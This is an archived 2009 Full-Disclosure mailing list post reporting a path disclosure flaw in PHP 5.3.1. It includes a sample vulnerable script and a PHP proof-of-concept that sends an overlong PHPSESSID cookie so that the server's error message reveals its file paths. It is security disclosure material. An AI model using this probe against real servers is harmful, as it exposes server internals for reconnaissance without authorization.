lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 27 Dec 2009 02:48:29 -0300 From: WHK <www.kernel32@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Path disclosure in PHP 5.3.1 Make a script vulnerable: <?php session_start(); if($_SESSION) echo $_SESSION; else $_SESSION = 'xx'; ?> Now look the script in you explorer and change the value of cookie "PHPSESSID" to 300 chars "a" and look the disclosure: Warning: session_start() [function.session-start]: open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php on line 3 PoC: <?php error_reporting(0); $payload = 'GET / HTTP/1.1 Host: 127.0.0.1 Connection: close Cookie: PHPSESSID='.str_repeat('a', 500).'; '; if(!$handle = fsockopen('127.0.0.1', 80)){ die('Error'); }else{ fputs($handle, $payload); while(!feof($handle)){ $retorno .= fread($handle, 1024); } echo nl2br(htmlspecialchars($retorno, ENT_QUOTES)); } ?> if value of cookie is "aaaaaaa" then file in temp of server is "sess_aaaaaaa", if value of cookie is ax300 dont make file and return the error message. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists